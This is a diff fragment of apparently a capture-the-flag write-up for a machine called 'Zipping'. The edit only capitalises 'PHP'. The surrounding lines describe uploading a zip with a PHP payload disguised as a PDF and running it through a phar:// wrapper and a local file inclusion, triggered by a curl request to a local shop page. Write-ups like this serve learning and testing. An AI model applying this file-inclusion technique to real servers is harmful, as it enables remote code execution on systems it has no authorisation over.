Paliak/PaliaksNotes/docs/Zipping/index.md

   adding: e.pdf (deflated 37%)
 ```

-now after uploading pwn.zip we can use a phar wrapper to execute the php payload like so (note the LFI appends `.php` to the included file):
+now after uploading pwn.zip we can use a phar wrapper to execute the PHP payload like so (note the LFI appends `.php` to the included file):

 ```bash
 curl 'http://127.0.0.1:8000/shop/index.php?page=phar://../uploads/abc3364b5e4232c09742daa9099baefb/e.pdf/sh'